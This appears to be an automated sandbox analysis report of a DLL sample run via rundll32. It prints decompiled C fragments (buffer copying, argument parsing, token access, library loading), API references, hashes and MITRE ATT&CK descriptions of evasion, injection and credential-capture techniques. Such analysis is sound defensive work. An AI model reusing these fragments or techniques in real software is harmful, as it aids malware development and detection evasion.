							 *( *_t272 + 0xc) =  *( *_t272 + 0xc) + _t252;
							 *((intOrPtr*)( *_t272 + 0x10)) =  *((intOrPtr*)( *_t272 + 0x10)) - _t252;
							 *((intOrPtr*)( *_t272 + 0x14)) =  *((intOrPtr*)( *_t272 + 0x14)) + _t252;
							 *(_t272 + 0x5c) =  *(_t272 + 0x5c) + _t252;
							_t227 = _t227 - _t252;
						}
						if(_t227 != 0) {
							E10016BA0( *_t272,  *( *_t272 + 0xc), _t227);
							_t273 = _t273 + 0xc;
							 *( *_t272 + 0xc) =  *( *_t272 + 0xc) + _t227;
							 *((intOrPtr*)( *_t272 + 0x10)) =  *((intOrPtr*)( *_t272 + 0x10)) - _t227;
							 *((intOrPtr*)( *_t272 + 0x14)) =  *((intOrPtr*)( *_t272 + 0x14)) + _t227;
						}
						_t253 = _a8;
						if(_t269 == 0) {
							continue;
						}
					} else {
						if(_t227 != 0 || _t253 == 4) {
							if(_t253 != 0 && _t227 == _t195) {
								goto L7;
							}
						}
					}
					break;
				}
				_t142 =  *_t272;
				_t232 = _a4 -  *((intOrPtr*)(_t142 + 4));
				_a4 = _t232;
				if(_t232 == 0) {
					_t83 = _t272 + 0x6c; // 0x20fd8a1
					_t254 =  *_t83;
				} else {
					_t59 = _t272 + 0x2c; // 0x8df075ff
					_t224 =  *_t59;
					if(_t232 < _t224) {
						_t65 = _t272 + 0x3c; // 0x830cc483
						_t66 = _t272 + 0x6c; // 0x20fd8a1
						_t260 =  *_t66;
						__eflags =  *_t65 - _t260 - _t232;
						if( *_t65 - _t260 <= _t232) {
							_t67 = _t272 + 0x38; // 0xf47d8bff
							_t261 = _t260 - _t224;
							 *(_t272 + 0x6c) = _t261;
							memcpy( *_t67,  *_t67 + _t224, _t261);
							_t70 = _t272 + 0x16b0; // 0x1488087d
							_t188 =  *_t70;
							_t273 = _t273 + 0xc;
							_t232 = _a4;
							__eflags = _t188 - 2;
							if(_t188 < 2) {
								_t189 = _t188 + 1;
								__eflags = _t189;
								 *(_t272 + 0x16b0) = _t189;
							}
						}
						_t73 = _t272 + 0x38; // 0xf47d8bff
						_t74 = _t272 + 0x6c; // 0x20fd8a1
						memcpy( *_t73 +  *_t74,  *((intOrPtr*)( *_t272)) - _t232, _t232);
						_t225 = _a4;
						_t273 = _t273 + 0xc;
						_t76 = _t272 + 0x6c;
						 *_t76 =  *(_t272 + 0x6c) + _t225;
						__eflags =  *_t76;
						_t78 = _t272 + 0x6c; // 0x20fd8a1
						_t184 =  *_t78;
						_t79 = _t272 + 0x2c; // 0x8df075ff
						_t239 =  *_t79;
					} else {
						 *(_t272 + 0x16b0) = 2;
						_t61 = _t272 + 0x38; // 0xf47d8bff
						memcpy( *_t61,  *_t142 - _t224, _t224);
						_t62 = _t272 + 0x2c; // 0x8df075ff
						_t184 =  *_t62;
						_t273 = _t273 + 0xc;
						_t225 = _a4;
						_t239 = _t184;
						 *(_t272 + 0x6c) = _t184;
					}
					_t254 = _t184;
					 *(_t272 + 0x5c) = _t184;
					_t81 = _t272 + 0x16b4; // 0xff4d8a39
					_t185 =  *_t81;
					_t240 = _t239 - _t185;
					_t241 =  <=  ? _t225 : _t240;
					_t242 = ( <=  ? _t225 : _t240) + _t185;
					 *((intOrPtr*)(_t272 + 0x16b4)) = ( <=  ? _t225 : _t240) + _t185;
				}
				if( *(_t272 + 0x16c0) < _t254) {
					 *(_t272 + 0x16c0) = _t254;
				}
				if(_t269 == 0) {
					_t218 = _a8;
					__eflags = _t218;
					if(_t218 == 0) {
						L34:
						_t89 = _t272 + 0x3c; // 0x830cc483
						_t219 =  *_t272;
						_t145 =  *_t89 - _t254 - 1;
						_a4 =  *_t272;
						_t234 = _t254;
						_v16 = _t145;
						_v8 = _t254;
						__eflags =  *((intOrPtr*)(_t219 + 4)) - _t145;
						if( *((intOrPtr*)(_t219 + 4)) > _t145) {
							_v8 = _t254;
							_t95 = _t272 + 0x5c; // 0x38e85000
							_a4 = _t219;
							_t234 = _t254;
							_t97 = _t272 + 0x2c; // 0x8df075ff
							__eflags =  *_t95 -  *_t97;
							if( *_t95 >=  *_t97) {
								_t98 = _t272 + 0x2c; // 0x8df075ff
								_t167 =  *_t98;
								_t259 = _t254 - _t167;
								_t99 = _t272 + 0x38; // 0xf47d8bff
								 *(_t272 + 0x5c) =  *(_t272 + 0x5c) - _t167;
								 *(_t272 + 0x6c) = _t259;
								memcpy( *_t99, _t167 +  *_t99, _t259);
								_t103 = _t272 + 0x16b0; // 0x1488087d
								_t170 =  *_t103;
								_t273 = _t273 + 0xc;
								__eflags = _t170 - 2;
								if(_t170 < 2) {
									_t172 = _t170 + 1;
									__eflags = _t172;
									 *(_t272 + 0x16b0) = _t172;
								}
								_t106 = _t272 + 0x2c; // 0x8df075ff
								_t145 = _v16 +  *_t106;
								__eflags = _t145;
								_a4 =  *_t272;
								_t108 = _t272 + 0x6c; // 0x20fd8a1
								_t234 =  *_t108;
								_v8 = _t234;
							}
						}
						_t255 = _a4;
						_t220 =  *((intOrPtr*)(_a4 + 4));
						__eflags = _t145 - _t220;
						_t221 =  <=  ? _t145 : _t220;
						_t146 = _t221;
						_a4 = _t221;
						_t222 = _a8;
						__eflags = _t146;
						if(_t146 != 0) {
							_t114 = _t272 + 0x38; // 0xf47d8bff
							E10016BA0(_t255,  *_t114 + _v8, _t146);
							_t273 = _t273 + 0xc;
							_t117 = _t272 + 0x6c;
							 *_t117 =  *(_t272 + 0x6c) + _a4;
							__eflags =  *_t117;
							_t119 = _t272 + 0x6c; // 0x20fd8a1
							_t234 =  *_t119;
						}
						__eflags =  *(_t272 + 0x16c0) - _t234;
						if( *(_t272 + 0x16c0) < _t234) {
							 *(_t272 + 0x16c0) = _t234;
						}
						_t122 = _t272 + 0x16bc; // 0x40f8458b
						_t123 = _t272 + 0xc; // 0x452bf84d
						_t257 =  *_t123 - ( *_t122 + 0x2a >> 3);
						__eflags = _t257 - 0xffff;
						_t258 =  >  ? 0xffff : _t257;
						_t124 = _t272 + 0x2c; // 0x8df075ff
						_t151 =  *_t124;
						_t125 = _t272 + 0x5c; // 0x38e85000
						_t235 = _t234 -  *_t125;
						__eflags = _t258 - _t151;
						_t152 =  <=  ? _t258 : _t151;
						__eflags = _t235 - ( <=  ? _t258 : _t151);
						if(_t235 >= ( <=  ? _t258 : _t151)) {
							L49:
							__eflags = _t235 - _t258;
							_t154 =  >  ? _t258 : _t235;
							_a4 =  >  ? _t258 : _t235;
							__eflags = _t222 - 4;
							if(_t222 != 4) {
								L53:
								_t269 = 0;
								__eflags = 0;
							} else {
								_t161 =  *_t272;
								__eflags =  *(_t161 + 4);
								_t154 = _a4;
								if( *(_t161 + 4) != 0) {
									goto L53;
								} else {
									__eflags = _t154 - _t235;
									if(_t154 != _t235) {
										goto L53;
									} else {
										_t269 = _t222 - 3;
									}
								}
							}
							_t131 = _t272 + 0x38; // 0xf47d8bff
							_t132 = _t272 + 0x5c; // 0x38e85000
							E10017D00(_t272, _t272,  *_t131 +  *_t132, _t154, _t269);
							_t134 = _t272 + 0x5c;
							 *_t134 =  *(_t272 + 0x5c) + _a4;
							__eflags =  *_t134;
							E10016A60( *_t134,  *_t272);
						} else {
							__eflags = _t235;
							if(_t235 != 0) {
								L46:
								__eflags = _t222;
								if(_t222 != 0) {
									_t162 =  *_t272;
									__eflags =  *(_t162 + 4);
									if( *(_t162 + 4) == 0) {
										__eflags = _t235 - _t258;
										if(_t235 <= _t258) {
											goto L49;
										}
									}
								}
							} else {
								__eflags = _t222 - 4;
								if(_t222 == 4) {
									goto L46;
								}
							}
						}
						asm("sbb edi, edi");
						_t271 =  ~_t269 & 0x00000002;
						__eflags = _t271;
						return _t271;
					} else {
						__eflags = _t218 - 4;
						if(_t218 == 4) {
							goto L34;
						} else {
							_t173 =  *_t272;
							__eflags =  *(_t173 + 4);
							if( *(_t173 + 4) != 0) {
								goto L34;
							} else {
								_t88 = _t272 + 0x5c; // 0x38e85000
								__eflags = _t254 -  *_t88;
								if(_t254 !=  *_t88) {
									goto L34;
								} else {
									return 1;
								}
							}
						}
					}
				} else {
					return 3;
				}
			}

0x10014ce6
0x10014ceb
0x10014cef
0x10014cf2
0x10014cf2
0x10014cf5
0x10014cfa
0x10014cff
0x10014d02
0x10014d07
0x10014d0a
0x10014d10
0x10014d10
0x10014d1b
0x10014d1e
0x10014d25
0x10014d2a
0x00000000
0x00000000
0x10014d30
0x10014d35
0x10014d35
0x10014d3a
0x10014d40
0x10014d4a
0x10014d4f
0x10014d55
0x10014d74
0x10014d77
0x10014d82
0x10014d82
0x10014d82
0x10014d79
0x10014d79
0x10014d7b
0x00000000
0x10014d7d
0x10014d7d
0x10014d7d
0x10014d7b
0x10014d8a
0x10014d8f
0x10014d94
0x10014d9a
0x10014d9e
0x10014da1
0x10014da4
0x10014daa
0x10014daf
0x10014db2
0x10014db8
0x10014dbd
0x10014dc3
0x10014dc9
0x10014dce
0x10014dd1
0x10014dd6
0x10014dda
0x10014dde
0x10014de1
0x10014de4
0x10014ded
0x10014df4
0x10014df7
0x10014dfa
0x10014dff
0x10014e04
0x10014e07
0x10014e0a
0x10014e0a
0x10014e0e
0x10014e17
0x10014e1e
0x10014e21
0x10014e26
0x10014e2b
0x10014e2b
0x10014e2e
0x10014e33
0x00000000
0x00000000
0x10014d57
0x10014d59
0x10014d66
0x00000000
0x00000000
0x10014d66
0x10014d59
0x00000000
0x10014d55
0x10014e39
0x10014e3e
0x10014e41
0x10014e44
0x10014eef
0x10014eef
0x10014e4a
0x10014e4a
0x10014e4a
0x10014e4f
0x10014e79
0x10014e7c
0x10014e7c
0x10014e81
0x10014e83
0x10014e85
0x10014e88
0x10014e8b
0x10014e93
0x10014e98
0x10014e98
0x10014e9e
0x10014ea1
0x10014ea4
0x10014ea7
0x10014ea9
0x10014ea9
0x10014eaa
0x10014eaa
0x10014ea7
0x10014eb8
0x10014ebb
0x10014ebf
0x10014ec4
0x10014ec7
0x10014eca
0x10014eca
0x10014eca
0x10014ecd
0x10014ecd
0x10014ed0
0x10014ed0
0x10014e51
0x10014e51
0x10014e61
0x10014e64
0x10014e69
0x10014e69
0x10014e6c
0x10014e6f
0x10014e72
0x10014e74
0x10014e74
0x10014ed3
0x10014ed5
0x10014ed8
0x10014ed8
0x10014ede
0x10014ee2
0x10014ee5
0x10014ee7
0x10014ee7
0x10014ef8
0x10014efa
0x10014efa
0x10014f02
0x10014f10
0x10014f13
0x10014f15
0x10014f35
0x10014f35
0x10014f38
0x10014f3e
0x10014f3f
0x10014f42
0x10014f44
0x10014f47
0x10014f4a
0x10014f4d
0x10014f51
0x10014f54
0x10014f57
0x10014f5a
0x10014f5c
0x10014f5c
0x10014f5f
0x10014f61
0x10014f61
0x10014f64
0x10014f66
0x10014f69
0x10014f71
0x10014f74
0x10014f79
0x10014f79
0x10014f7f
0x10014f82
0x10014f85
0x10014f87
0x10014f87
0x10014f88
0x10014f88
0x10014f93
0x10014f93
0x10014f93
0x10014f96
0x10014f99
0x10014f99
0x10014f9c
0x10014f9c
0x10014f5f
0x10014f9f
0x10014fa2
0x10014fa5
0x10014fa7
0x10014faa
0x10014fac
0x10014faf
0x10014fb2
0x10014fb4
0x10014fb7
0x10014fbf
0x10014fc7
0x10014fca
0x10014fca
0x10014fca
0x10014fcd
0x10014fcd
0x10014fcd
0x10014fd0
0x10014fd6
0x10014fd8
0x10014fd8
0x10014fde
0x10014fe4
0x10014fed
0x10014ff4
0x10014ff6
0x10014ff9
0x10014ff9
0x10014ffc
0x10014ffc
0x10014fff
0x10015001
0x10015004
0x10015006
0x10015021
0x10015021
0x10015025
0x10015028
0x1001502b
0x1001502e
0x10015044
0x10015044
0x10015044
0x10015030
0x10015030
0x10015032
0x10015036
0x10015039
0x00000000
0x1001503b
0x1001503b
0x1001503d
0x00000000
0x1001503f
0x1001503f
0x1001503f
0x1001503d
0x10015039
0x10015048
0x1001504b
0x10015050
0x1001505a
0x1001505a
0x1001505a
0x1001505d
0x10015008
0x10015008
0x1001500a
0x10015011
0x10015011
0x10015013
0x10015015
0x10015017
0x1001501b
0x1001501d
0x1001501f
0x00000000
0x00000000
0x1001501f
0x1001501b
0x1001500c
0x1001500c
0x1001500f
0x00000000
0x00000000
0x1001500f
0x1001500a
0x10015067
0x10015069
0x10015069
0x10015074
0x10014f17
0x10014f17
0x10014f1a
0x00000000
0x10014f1c
0x10014f1c
0x10014f1e
0x10014f22
0x00000000
0x10014f24
0x10014f24
0x10014f24
0x10014f27
0x00000000
0x10014f2b
0x10014f34
0x10014f34
0x10014f27
0x10014f22
0x10014f1a
0x10014f06
0x10014f0f
0x10014f0f

APIs

memcpy.MSVCRT ref: 10014DED
memcpy.MSVCRT ref: 10014E64
memcpy.MSVCRT ref: 10014E93
memcpy.MSVCRT ref: 10014EBF
memcpy.MSVCRT ref: 10014F74

Part of subcall function 10017D00: memcpy.MSVCRT ref: 10017DDE

Part of subcall function 10016A60: memcpy.MSVCRT ref: 10016A8A

Memory Dump Source

Source File: 00000010.00000002.406380576.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000010.00000002.406347694.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.406621828.000000001001A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.406660774.000000001001F000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.406687291.0000000010022000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_10000000_rundll32.jbxd

Similarity

API ID: memcpy
String ID:
API String ID: 3510742995-0
Opcode ID: 91640b19e7d0a89fb15d7722cf56a0f0eb65f90dc13b34d669ab98b2b0f7349b
Instruction ID: 608367cce7ce40668a14c070f4f8b38a81cfced9e19564bd56cf48f5647a2197
Opcode Fuzzy Hash: 91640b19e7d0a89fb15d7722cf56a0f0eb65f90dc13b34d669ab98b2b0f7349b
Instruction Fuzzy Hash: 7ED10475600A059FCB24CF69D8C4A6AB7E5FF88344B25892DE88ACB711DB31F985CB50

Uniqueness

Uniqueness Score: -1.00%

Function 1000BA2B Relevance: 6.1, APIs: 4, Instructions: 97
stringCOMMON

Download Yara Rule

C-Code - Quality: 92%

			E1000BA2B(intOrPtr __ecx) {
				int _v8;
				signed int _v12;
				intOrPtr _v16;
				short* _v140;
				intOrPtr _v144;
				short _v664;
				signed int _t28;
				signed int _t29;
				signed int _t30;
				int _t40;
				signed int _t41;
				int _t44;
				signed int _t45;
				WCHAR* _t52;
				signed int _t54;
				short* _t55;
				void* _t56;

				_v8 = _v8 & 0x00000000;
				_v16 = __ecx;
				_t54 = 0;
				_t28 = CommandLineToArgvW(GetCommandLineW(),  &_v8);
				_t44 = _v8;
				_t41 = 0;
				_v12 = _t28;
				if(_t44 <= 0) {
					L22:
					_t29 = _t28 | 0xffffffff;
					__eflags = _t29;
					return _t29;
				} else {
					goto L1;
				}
				do {
					L1:
					_t52 =  *(_t28 + _t41 * 4);
					_t30 =  *_t52 & 0x0000ffff;
					if(_t30 != 0 && _t30 != 0xd && _t30 != 0xa && _t30 != 0x2d && _t30 != 0x2f && _t54 < 0x20) {
						 *(_t56 + _t54 * 4 - 0x8c) = _t52;
						_t40 = lstrlenW(_t52);
						_t45 = 0;
						if(_t40 <= 0) {
							L11:
							_t44 = _v8;
							_t54 = _t54 + 1;
							goto L12;
						} else {
							goto L8;
						}
						do {
							L8:
							if(_t52[_t45] == 0x2c) {
								_t52[_t45] = 0;
							}
							_t45 = _t45 + 1;
						} while (_t45 < _t40);
						goto L11;
					}
					L12:
					_t28 = _v12;
					_t41 = _t41 + 1;
				} while (_t41 < _t44);
				if(_t54 != 1) {
					if(__eflags <= 0) {
						goto L22;
					}
					_t55 = _v140;
					L17:
					if( *_t55 == 0x5c ||  *((short*)(_t55 + 2)) == 0x3a) {
						E1000C229(_v16, _t55, 0x104);
					} else {
						GetCurrentDirectoryW(0x104,  &_v664);
						_push(0);
						_push(_t55);
						_push("\\");
						_v12 = E100099EC( &_v664);
						E1000C229(_v16, _t36, 0x104);
						E10009203( &_v12, 0xfffffffe);
					}
					return 0;
				}
				_t55 = _v144;
				goto L17;
			}

0x1000ba34
0x1000ba3b
0x1000ba3e
0x1000ba4b
0x1000ba51
0x1000ba54
0x1000ba56
0x1000ba5b
0x1000bb32
0x1000bb32
0x1000bb32
0x00000000
0x00000000
0x00000000
0x00000000
0x1000ba61
0x1000ba61
0x1000ba61
0x1000ba64
0x1000ba6a
0x1000ba86
0x1000ba8d
0x1000ba93
0x1000ba97
0x1000baab
0x1000baab
0x1000baae
0x00000000
0x00000000
0x00000000
0x00000000
0x1000ba99
0x1000ba99
0x1000ba9e
0x1000baa2
0x1000baa2
0x1000baa6
0x1000baa7
0x00000000
0x1000ba99
0x1000baaf
0x1000baaf
0x1000bab2
0x1000bab3
0x1000baba
0x1000bac4
0x00000000
0x00000000
0x1000bac6
0x1000bacc
0x1000bad0
0x1000bb28
0x1000bad9
0x1000bae6
0x1000baec
0x1000baee
0x1000baf5
0x1000bb06
0x1000bb09
0x1000bb14
0x1000bb19
0x00000000
0x1000bb2e
0x1000babc
0x00000000

APIs

GetCommandLineW.KERNEL32(00000000,00000228,00000228), ref: 1000BA40
CommandLineToArgvW.SHELL32(00000000,00000000), ref: 1000BA4B
lstrlenW.KERNEL32(00000000), ref: 1000BA8D
GetCurrentDirectoryW.KERNEL32(00000104,?), ref: 1000BAE6

Memory Dump Source

Source File: 00000010.00000002.406380576.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000010.00000002.406347694.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.406621828.000000001001A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.406660774.000000001001F000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.406687291.0000000010022000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_10000000_rundll32.jbxd

Similarity

API ID: CommandLine$ArgvCurrentDirectorylstrlen
String ID:
API String ID: 159791187-0
Opcode ID: 6aebfb5b06c6c39044bafa0a3afa5e56d5a16357a18df3b8b45862e1094ba118
Instruction ID: 1dfb13a73697d1065cdb57a4d8345c5b051b7baf3ee2abb54885a1e1bf2053b0
Opcode Fuzzy Hash: 6aebfb5b06c6c39044bafa0a3afa5e56d5a16357a18df3b8b45862e1094ba118
Instruction Fuzzy Hash: B431B375E00515AFEB14DF948885AADB7F8EF4A3D0F11845AD842E3198DB709E81CB62

Uniqueness

Uniqueness Score: -1.00%

Function 1000DC3C Relevance: 6.0, APIs: 4, Instructions: 33
threadCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E1000DC3C(void* __ecx) {
				void* _v8;
				void* _t10;
				intOrPtr _t13;

				if(OpenThreadToken(GetCurrentThread(), 8, 0,  &_v8) != 0) {
					L4:
					_t10 = _v8;
				} else {
					if(GetLastError() != 0x3f0) {
						L3:
						_t10 = 0;
					} else {
						_t13 =  *0x10020fa0; // 0x474f8a0
						if(OpenProcessToken( *((intOrPtr*)(_t13 + 0x130))(), 8,  &_v8) != 0) {
							goto L4;
						} else {
							goto L3;
						}
					}
				}
				return _t10;
			}

0x1000dc5b
0x1000dc8d
0x1000dc8d
0x1000dc5d
0x1000dc68
0x1000dc89
0x1000dc89
0x1000dc6a
0x1000dc74
0x1000dc87
0x00000000
0x00000000
0x00000000
0x00000000
0x1000dc87
0x1000dc68
0x1000dc92

APIs

GetCurrentThread.KERNEL32 ref: 1000DC4F
OpenThreadToken.ADVAPI32(00000000,?,?,1000DD81,00000000,10000000), ref: 1000DC56
GetLastError.KERNEL32(?,?,1000DD81,00000000,10000000), ref: 1000DC5D
OpenProcessToken.ADVAPI32(00000000,?,?,1000DD81,00000000,10000000), ref: 1000DC82

Memory Dump Source

Source File: 00000010.00000002.406380576.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000010.00000002.406347694.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.406621828.000000001001A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.406660774.000000001001F000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.406687291.0000000010022000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_10000000_rundll32.jbxd

Similarity

API ID: OpenThreadToken$CurrentErrorLastProcess
String ID:
API String ID: 1515895013-0
Opcode ID: b792e2a9ee284b098ae62641809742da31258a1248d596868d4d4808ebbd8cb3
Instruction ID: 0e5175ae539005769c67e2d26daef5d126bf47866e8b33fffce6e4c685f75d4f
Opcode Fuzzy Hash: b792e2a9ee284b098ae62641809742da31258a1248d596868d4d4808ebbd8cb3
Instruction Fuzzy Hash: 34F0303164021AAFFB50EBA4CD89F5E77ECFB08380F150465F602D7491DA70E901DB60

Uniqueness

Uniqueness Score: -1.00%

Function 1000A2EA Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 107
libraryCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E1000A2EA(void* __ecx, void* __edx) {
				WCHAR* _v8;
				char _v12;
				char _v140;
				WCHAR* _t12;
				intOrPtr _t17;
				void* _t22;
				intOrPtr _t23;
				intOrPtr _t29;
				intOrPtr _t32;
				void* _t43;
				void* _t54;
				WCHAR* _t55;
				char* _t56;
				WCHAR* _t57;
				intOrPtr _t58;
				char _t60;
				struct HINSTANCE__* _t61;

				_t43 = 0;
				_t12 = E100091B2(__ecx, 0x152a);
				_t58 =  *0x10020fd8; // 0x474fc50
				_t55 = _t12;
				_t59 = _t58 + 0xb0;
				_v8 = _t55;
				E1000C172( &_v140, 0x40, L"%08x", E1000E6E9(_t59, E1000CF09(_t58 + 0xb0), 0));
				_t17 =  *0x10020fd8; // 0x474fc50
				_t3 = _t17 + 0xa8; // 0x1
				asm("sbb eax, eax");
				_t22 = E100091B2(_t59, ( ~( *_t3) & 0x000010d8) + 0x2f7);
				_t56 = "\\";
				_t23 =  *0x10020fd8; // 0x474fc50
				_t60 = E100099EC(_t23 + 0x1020);
				_v12 = _t60;
				E10009E2E( &_v8);
				_t29 =  *0x10020fd8; // 0x474fc50
				_t57 = E100099EC(_t29 + 0x122a);
				_t32 =  *0x10020fa0; // 0x474f8a0
				_v8 = _t57;
				 *((intOrPtr*)(_t32 + 0x120))(_t60, _t57, 0, _t56,  &_v140, ".", L"dll", 0, _t56, _t22, _t56, _t55, 0);
				_t61 = LoadLibraryW(_t57);
				if(_t61 != 0) {
					_push(_t61);
					_t54 = 0x40;
					_t43 = E1000950E(0x1001d9c0, _t54);
				}
				E10009203( &_v12, 0xfffffffe);
				E1000936A( &_v140, 0, 0x80);
				if(_t43 != 0) {
					 *0x100210b0 = _t61;
					 *0x100210b8 = _t57;
				} else {
					E10009203( &_v8, 0xfffffffe);
				}
				return _t43;
			}

0x1000a2fb
0x1000a2fd
0x1000a302
0x1000a308
0x1000a30b
0x1000a311
0x1000a334
0x1000a339
0x1000a33e
0x1000a346
0x1000a353
0x1000a35a
0x1000a361
0x1000a372
0x1000a378
0x1000a37b
0x1000a392
0x1000a3a6
0x1000a3a8
0x1000a3ad
0x1000a3b3
0x1000a3c0
0x1000a3c4
0x1000a3c6
0x1000a3c9
0x1000a3d5
0x1000a3d5
0x1000a3dd
0x1000a3f0
0x1000a3fa
0x1000a40b
0x1000a411
0x1000a3fc
0x1000a402
0x1000a408
0x1000a41d

APIs

Part of subcall function 1000C172: _vsnwprintf.MSVCRT ref: 1000C18F

Part of subcall function 100099EC: lstrcatW.KERNEL32(00000000,?), ref: 10009A2B

LoadLibraryW.KERNEL32(00000000), ref: 1000A3BA

Strings

dll, xrefs: 1000A381
%08x, xrefs: 1000A326

Memory Dump Source

Source File: 00000010.00000002.406380576.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000010.00000002.406347694.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.406621828.000000001001A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.406660774.000000001001F000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.406687291.0000000010022000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_10000000_rundll32.jbxd

Similarity

API ID: LibraryLoad_vsnwprintflstrcat
String ID: %08x$dll
API String ID: 1445519121-2963171978
Opcode ID: ee69ddeb78258e57ff159ad9a30d3da6fa3b71f745943adbbaa0d20dd1f6eede
Instruction ID: da7a666e81fd9e8665abe568421c0efaf6e603c8ab56a2e2e86a9924a4d9d885
Opcode Fuzzy Hash: ee69ddeb78258e57ff159ad9a30d3da6fa3b71f745943adbbaa0d20dd1f6eede
Instruction Fuzzy Hash: 77310776A042147BF750E7649C86FDB36ADEB85790F200175F204E7286DE74DE8587A0

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by hijacking the library manifest used to load DLLs. Adversaries may take advantage of vague references in the library manifest of a program by replacing a legitimate library with a malicious one, causing the operating system to load their malicious library when it is called for by the victim program.
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	Loaded DLLs, Process monitoring, Process use of network
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. Shared Modules ), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads.
Tactics:	Defense Evasion
Data Sources:	DLL monitoring, Loaded DLLs, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may hook into Windows application programming interface (API) functions to collect user credentials. Malicious hooking mechanisms may capture API calls that include parameters that reveal user authentication credentials.Unlike Keylogging , this technique focuses specifically on API functions that include parameters that reveal user credentials. Hooking involves redirecting calls to these functions and can be implemented via:
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Loaded DLLs, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

